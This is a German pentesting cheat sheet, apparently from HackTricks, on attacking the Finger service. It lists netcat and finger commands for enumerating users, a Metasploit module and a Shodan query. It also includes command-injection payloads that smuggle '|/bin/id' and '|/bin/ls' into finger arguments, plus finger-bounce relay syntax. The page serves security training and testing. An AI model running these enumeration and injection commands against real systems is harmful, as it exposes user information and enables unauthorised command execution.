57 lines
1.8 KiB
Markdown

# 79 - Pentesting Finger
{{#include ../banners/hacktricks-training.md}}
## **Grundinformationen**
Das **Finger**-Programm/-Dienst wird verwendet, um Details über Computerbenutzer abzurufen. Typischerweise umfasst die bereitgestellte Information den **Benutzernamen, den vollständigen Namen** und in einigen Fällen zusätzliche Details. Diese zusätzlichen Details können den Bürostandort und die Telefonnummer (sofern verfügbar), die Zeit, zu der sich der Benutzer angemeldet hat, die Inaktivitätsdauer (Leerlaufzeit), den letzten Zeitpunkt, an dem die E-Mail vom Benutzer gelesen wurde, sowie den Inhalt der Plan- und Projektdateien des Benutzers umfassen.
**Standardport:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Enumeration**
### **Banner Grabbing/Grundlegende Verbindung**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Benutzerauszählung**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternativ können Sie **finger-user-enum** von [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) verwenden, einige Beispiele:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap führt ein Skript aus, um Standard-Skripte zu verwenden**
### Metasploit verwendet mehr Tricks als Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
- `port:79 USER`
## Befehlsausführung
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Verwenden Sie ein System als Finger-Relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{{#include ../banners/hacktricks-training.md}}